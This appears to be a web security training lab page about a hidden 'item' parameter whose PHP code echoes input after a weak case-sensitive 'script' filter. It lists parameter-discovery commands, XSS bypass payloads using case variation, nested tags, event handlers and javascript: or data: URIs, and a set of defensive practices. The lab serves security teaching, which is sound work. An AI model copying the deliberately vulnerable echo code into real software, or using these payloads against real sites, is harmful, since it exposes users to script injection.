Hidden Parameter XSS Lab

Find the hidden parameter and bypass simple filtering

Hidden Parameter Challenge

Lab Overview

This lab contains a hidden parameter that you need to discover before testing XSS payloads. The visible form uses secure HTML encoding, but there's another endpoint with simpler filtering.

Visible Challenge: Basic HTML encoding using htmlspecialchars() for both first name and last name parameters.
Hidden Parameter: There's another parameter that's not shown in the form. Use tools like Arjun to discover it!
# use arjun tool to find hidden parameter
Hidden Parameter Filter: Simple string replacement that removes 'script' (case-sensitive)
Blocked string:
script
Filter method: str_replace('script', '', $_GET['item'])
Filter Complexity: Basic String Replacement

Objective: Discover the hidden parameter and bypass the simple 'script' filter to execute XSS.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["item"])){
    $re = str_replace('script', '', $_GET['item']);
    echo $re;
}
# use arjun tool to find hidden parameter
Test Input Forms
Challenge 1: HTML Encoding (Visible)
This field uses htmlspecialchars() encoding
This field uses htmlspecialchars() encoding
Challenge 2: Hidden Parameter
Hint: The parameter name is not shown in the form. You need to discover it using parameter discovery tools.
This parameter uses simple 'script' filter (case-sensitive)
Parameter Discovery & Bypass Techniques
Parameter Discovery Tools:
  • Arjun: arjun -u https://example.com
  • ParamSpider: python3 paramspider.py -d example.com
  • FFUF: ffuf -w wordlist.txt -u https://example.com?FUZZ=test
  • Manual testing: Try common parameter names like: id, page, view, search, q, s, item, product, etc.
Bypass Techniques for Simple Filter:
  • Case variation: Use <SCRIPT>, <Script>, <ScRiPt>
  • Nested tags: Use <scr<script>ipt> to bypass simple filters
  • Alternative tags: Use <img src=x onerror=alert(1)>
  • Event handlers: Use <body onload=alert(1)>, <svg onload=alert(1)>
  • JavaScript protocol: Use <a href="javascript:alert(1)">click</a>
Security Implications

This lab demonstrates:

  • Hidden parameters can create security blind spots
  • Simple string replacement filters are easily bypassed
  • Case-sensitive filtering is ineffective
  • Parameter discovery is a critical part of security testing
  • Different endpoints may have different security levels
  • Comprehensive testing requires checking all possible inputs
Best Practices

For secure web applications:

  • Use consistent security controls across all endpoints
  • Implement context-aware output encoding
  • Avoid simple string replacement for security filtering
  • Use Content Security Policy (CSP) headers
  • Conduct thorough parameter discovery during testing
  • Document all API endpoints and parameters
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
Payload Examples for Hidden Parameter
Case Variation Bypasses:
  • <SCRIPT>alert(1)</SCRIPT>
  • <Script>alert(1)</Script>
  • <ScRiPt>alert(1)</ScRiPt>
Alternative Tag Vectors:
  • <img src=x onerror=alert(1)>
  • <body onload=alert(1)>
  • <svg onload=alert(1)>
  • <iframe src="javascript:alert(1)">
Advanced Bypass Techniques:
  • <scr<script>ipt>alert(1)</scr<script>ipt> - Nested tags
  • <scrscriptipt>alert(1)</scrscriptipt> - Double writing
  • <script src="data:text/javascript,alert(1)"></script> - Data URI
  • <object data="javascript:alert(1)"></object> - Object tag